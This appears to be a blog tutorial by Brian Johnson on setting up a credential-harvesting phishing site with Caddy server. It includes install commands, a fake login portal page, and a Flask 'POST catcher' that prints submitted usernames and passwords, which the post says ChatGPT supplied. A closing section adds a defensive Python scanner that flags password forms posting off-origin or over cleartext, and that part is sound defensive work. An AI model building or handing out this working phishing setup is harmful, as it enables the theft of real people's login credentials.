


Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:

    sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https
    curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg
    curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list
    sudo apt update
    sudo apt install caddy -y

Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet), just put the domain name in the Caddyfile:

    domain.com

Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make an index.html with a basic phishing portal:

    Your rad awesome eyeball cool phishing portal!
    body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat: no-repeat; background-size: cover; }
    User Name:
    Password:
    Unauthorized use is prohibited!

This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:

    from flask import Flask, request

    app = Flask(__name__)

    @app.route('/capture', methods=['POST'])
    def capture():
        print(request.form)
        return 'OK', 200

    if __name__ == '__main__':
        app.run(host='0.0.0.0', port=5000)

If you don't have Flask installed, do this:

    sudo apt install python3-pip -y
    sudo pip install Flask

Run this file in one session, then in your index.html file make a small tweak in the form action directive:
Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!
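
From the defender's side, this setup has a recognizable shape: a password form whose action leaves the page's own origin for a separate listener. Here is an added example (not from the episode notes) that flags such forms. It assumes the form posts straight to the catcher on port 5000; the sample page and the hostname login.example.test are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FormScanner(HTMLParser):
    """Records each <form> action and whether the form holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def origin(url):
    # Origin = (scheme, host, port), with default ports filled in.
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port or {"http": 80, "https": 443}.get(p.scheme))

def suspicious_password_forms(page_url, html):
    """Return (target, reasons) for password forms posting off-origin or in cleartext."""
    scanner = FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        target = urljoin(page_url, form["action"])  # empty action resolves to the page
        reasons = []
        if origin(target) != origin(page_url):
            reasons.append("cross-origin")
        if urlsplit(target).scheme != "https":
            reasons.append("cleartext")
        if reasons:
            findings.append((target, reasons))
    return findings

# Constructed sample: a login form posting to a separate listener, plus a search form.
SAMPLE = '''<form method="post" action="http://login.example.test:5000/capture">
<input name="username"><input type="password" name="password"></form>
<form action="/search"><input name="q"></form>'''
```
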
By Brian Johnson